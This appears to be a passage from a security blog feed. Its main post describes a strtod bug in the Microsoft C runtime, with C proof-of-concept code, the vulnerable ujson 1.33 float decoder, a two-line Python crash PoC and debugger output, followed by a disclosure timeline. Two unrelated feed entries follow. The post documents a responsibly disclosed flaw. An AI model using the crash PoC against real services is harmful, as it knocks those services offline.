    char *number = (char*)malloc(SZ);
    memset(number, '1', SZ);
    number[SZ-1] = 'm'; // Break syntax.
    number[1] = '.'; // This is probably not needed.

    char *end_good = number + SZ - 1;
    char *end_strtod;

    // strtod(number, &end_strtod); is OK too
    // ... unless you use MinGW which uses its own strtod,
    // then it's better to just use _strtod_l for PoC.
    _strtod_l(number, &end_strtod, NULL);

    printf("number = %p\n", number);
    printf("end_good = %p\n", end_good);
    printf("end_strtod = %p\n", end_strtod);

    // Example (faulty) results.
    // number = 000000007FFF0040
    // end_good = 00000000FFFF0055
    // end_strtod = FFFFFFFFFFFF0055

    return 0;
}

Real world example

A random JSON parser for Python with native code - ujson 1.33:

FASTCALL_ATTR JSOBJ FASTCALL_MSVC decodePreciseFloat(struct DecoderState *ds)
{
  char *end;
  double value;
  errno = 0;

  value = strtod(ds->start, &end);

  if (errno == ERANGE)
  {
    return SetError(ds, -1, "Range error when decoding numeric as double");
  }

  ds->start = end;
  return ds->dec->newDouble(ds->prv, value);
}

And a crash DoS PoC in Python (2.7 AMD64):

import ujson

n = "4." + "3"*0x7fffffff
x = ujson.loads(n, precise_float=True)

WinDBG says:

(2088.1fa4): Access violation - code c0000005 (first chance)
00000001`800050dc 8a0a mov cl,byte ptr [rdx] ds:00000001`00010061=??


I've reported the bug to Microsoft and the decision was to fix it in future releases of Microsoft Visual C++ / Microsoft Windows. I think that's OK, especially taking into account that the chance of severe vulnerabilities appearing as a result of this Microsoft C runtime library bug is minimal (that said, if you find one, let me know ;>).


Note: A lot of e-mails were flying back and forth, so I'm not going to list all dates.

2013-Aug-21: Sent the report to Microsoft.
2013-Sep-17: Confirmation that the bug works as described and is planned to be fixed.
2013-Oct-26: More information - the bug will be fixed in the next versions of msvcr*.dll.
2013-Nov-13: Microsoft receives the draft of this blog post from me for comments.
2013-Nov-23: Blogpost is public.

And that's it.

Appmenu Qt5: through a bumpy road, but working!

By sil2100 | Tue, 19 Nov 2013 21:19:00 GMT | @domain:
Some time ago I mentioned working on the global application menu for Qt5 - the so-called appmenu-qt5 for Ubuntu and its derivatives. After a longer while, I finally found the time and occasion to resume my work - and, after a really bumpy ride, ended up with a working solution. Some hacks had to be made, some Qt5 design decisions worked around - but the end result is here: a working appmenu-qt5 QPA platformtheme plugin. In this post I would like to give an overview of the implementation of the currently proposed appmenu-qt5. Read on if you're interested in some of the Qt5 internals, the workings of QPlatformTheme plugins and the confusing elements of the Qt Platform Abstraction overall.

Windows System Call and CSR API tables updated

By j00ru | Sat, 16 Nov 2013 17:31:13 +0000 | @domain:
Having the first spare weekend in a really long time, I have decided it was high time to update some (all) of the tables related to Windows system calls and CSR API I once created and now try to maintain. This includes NT API syscalls for the 32-bit and 64-bit Intel platforms, win32k.sys syscalls for […]